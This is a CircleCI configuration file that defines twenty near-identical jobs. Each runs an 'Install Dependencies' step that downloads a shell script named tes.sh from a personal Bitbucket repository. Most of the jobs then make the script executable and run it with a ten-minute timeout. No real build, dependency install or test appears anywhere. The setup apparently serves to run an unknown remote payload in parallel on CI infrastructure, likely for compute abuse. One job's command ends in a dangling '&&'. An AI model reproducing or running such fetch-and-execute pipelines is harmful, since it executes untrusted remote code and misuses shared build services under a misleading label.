version: 2
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    applixaton1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    applixaton2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    applixaton5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh &&
    applixaton6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    applixaton8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    applixaton14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    applixaton20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Nohame00/go/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m

workflows:
    version: 2
    build:
        jobs:
            - applixaton1
            - applixaton2
            - applixaton3
            - applixaton4
            - applixaton5
            - applixaton6
            - applixaton7
            - applixaton8
            - applixaton9
            - applixaton10
            - applixaton11
            - applixaton12
            - applixaton13
            - applixaton14
            - applixaton15
            - applixaton16
            - applixaton17
            - applixaton18
            - applixaton19
            - applixaton20
            